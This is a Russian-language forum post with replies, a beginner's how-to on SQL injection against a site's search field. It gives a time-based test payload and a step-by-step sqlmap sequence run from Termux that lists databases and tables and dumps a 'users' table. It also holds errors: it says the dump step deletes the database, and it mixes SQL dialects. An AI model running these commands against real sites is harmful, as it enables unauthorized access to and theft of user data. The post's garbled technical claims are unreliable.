Прошу не бомбить в комментариях, что идея не моя. Писал текст я сам, перевел так сказать на доступный язык. Спасибо. Никогда подобным не занимался, пишу в ознакомительных целях Внедрение кода или инъекция SQL — это уязвимость системы безопасности в Интернете, позволяющая злоумышленнику завладеть доступом к SQL-запросам в базу данных. Так он может получить конфиденциальную информацию о структуре базы данных, таблицах, столбцах или полях вместе со всеми данными, которые там есть. Пример простой Sql инъекции: Допустим на сайте test.ru/каталог есть список товаров и поиск. Введем поисковый запрос "игрушечная машинка", нас перенаправляет на страницу test.ru/каталог?search=игрушечная+машинка Что же произошло? Сейчас сайт сделал Sql запрос в базу данных, чтобы прочитать и вывести товары с заголовком "игрушечная машинка". Пример запроса: SELECT * FROM `katalog` WHERE `name` LIKE 'игрушечная машинка' Код SELECT * FROM `katalog` WHERE `name` LIKE 'игрушечная машинка' Мы можем ввести в строку поиска вредоносный код, который поможет вытащить данные из базы данных. Как узнать, уязвим сайт или нет? Возьмём тот же самый поиск и тот же сайт, только в этот раз вместо "игрушечная машинка", мы введем вредоносный код: ' waitfor delay '0:10:0' Код ' waitfor delay '0:10:0' Этот код искусственно замедляет sql запрос, таким образом сайт будет посылать запрос SELECT * FROM `katalog` WHERE `name` LIKE '' waitfor delay '0:10:0' Код SELECT * FROM `katalog` WHERE `name` LIKE '' waitfor delay '0:10:0' Если вы заметили, что сайт стал загружаться медленнее, то он уязвим к таким инъекциям. Как же получить полный доступ к сайту? Нам понадобится Android, Termux и немного терпения. Запускаем Termux, прописываем следующий код: pkg upgrade pkg update pkg install git pkg install python pkg install wget git clone https://github.com/sqlmapproject/sqlmap.git cd sqlmap python sqlmap.py Код pkg upgrade pkg update pkg install git pkg install python pkg install wget git clone https://github.com/sqlmapproject/sqlmap.git cd sqlmap python sqlmap.py Далее прописываем python sqlmap.py -u http://test.ru/каталог?search?="игрушечная машинка" --dbs Код python sqlmap.py -u http://test.ru/каталог?search?="игрушечная машинка" --dbs И ждём... Если вы все сделали правильно, то в конечном итоге вы увидите следующие: Чтобы попасть в таблицу "acuart", нужно прописать python sqlmap.py -u http://test.ru/каталог?search="игрушечная машинка" -D acuart --tables Код python sqlmap.py -u http://test.ru/каталог?search="игрушечная машинка" -D acuart --tables Получаем примерно следующее: Чтобы окончательно удалить базу данных, прописываем python sqlmap.py -u http://test.ru/каталог?search="игрушечная машинка" -D acuart -T users --dump Код python sqlmap.py -u http://test.ru/каталог?search="игрушечная машинка" -D acuart -T users --dump Внимание! Данный способ работает не на всех сайтах
Leprosorium_inactive220411, не видел таких гайдов на просторах форума. Сейчас многие не опытные разработчики допускают банальные ошибки
жизнь_inactive3402465, маза не в том, что это есть на форуме. А в том, что кроме как некросайтов, никому ненужных, по состоянию на СЕГОДНЯ, ты - ничего не не заинжектиж в бд
Leprosorium_inactive220411, согласен. Но я писал и с целью показать начинающим разработчикам, как происходят взломы сайтов
Подскажите, пожалуйста, стоит или нет проходить обучение здесь? Курс - Тестирование Веб-Приложений на проникновение. Пишут, что это один из самых сильных курсов за всю историю рунета по теме Web Application Penetration Testing (WAPT). Может кто-то уже обучался у них?